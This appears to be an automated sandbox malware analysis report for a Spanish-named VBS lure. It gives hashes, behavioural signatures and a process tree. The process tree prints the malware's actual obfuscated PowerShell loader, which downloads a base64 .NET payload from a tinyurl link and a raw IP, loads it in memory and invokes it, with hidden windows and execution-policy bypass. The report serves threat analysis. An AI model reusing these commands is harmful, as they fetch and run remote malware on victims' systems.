Analysis
-
max time kernel
47s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
10/10/2022, 15:45
Static task
static1
Behavioral task
behavioral1
Sample
0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Resource
win7-20220901-en
General
-
Target
0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
-
Size
201KB
-
MD5
d31abe34b0270957dea045661492c0e3
-
SHA1
ff2d86a0282fcb7db59040e7ad0b77890bd719fb
-
SHA256
041169b1bab3881a74211ccf368ab7e605a44257bc714fabae64b1c49878bd66
-
SHA512
a93cf31ea7b162405b7c04c506b9944bdb6cf562fac0b22aa4e470bca499494bd09f6cd923a9111fb26de9df7dbae67468c20764a51f3ae28937478f33fdca5a
-
SSDEEP
96:dyYRYFYDnYFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9uaOAy/ATm45ZJ1qE
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 688 powershell.exe 6 688 powershell.exe 7 688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1860 powershell.exe 688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 688 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 852 wrote to memory of 1860 852 WScript.exe 27 PID 852 wrote to memory of 1860 852 WScript.exe 27 PID 852 wrote to memory of 1860 852 WScript.exe 27 PID 1860 wrote to memory of 688 1860 powershell.exe 29 PID 1860 wrote to memory of 688 1860 powershell.exe 29 PID 1860 wrote to memory of 688 1860 powershell.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gA3ADgANQA0AGYAcgBnAGgAagBrAHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0521547851_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R7854frghjkyhtyf5667' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56e9ce01bc1767deffc8269ac6e663dcf
SHA13e428d6a27ac7bade2a9d06e76ffbe2291f2d271
SHA2568af2684fc374ee1f0eb429f922da12daad6c8903be2bd732922669bd73486633
SHA512f4c8f128931f212d823f82ed56b70aab2d9d6c6f721f985823bbf0f28c3da4ae4a8285d7e73a0889a80c88189304f9e82a505858e19902545dede1ef71cdef51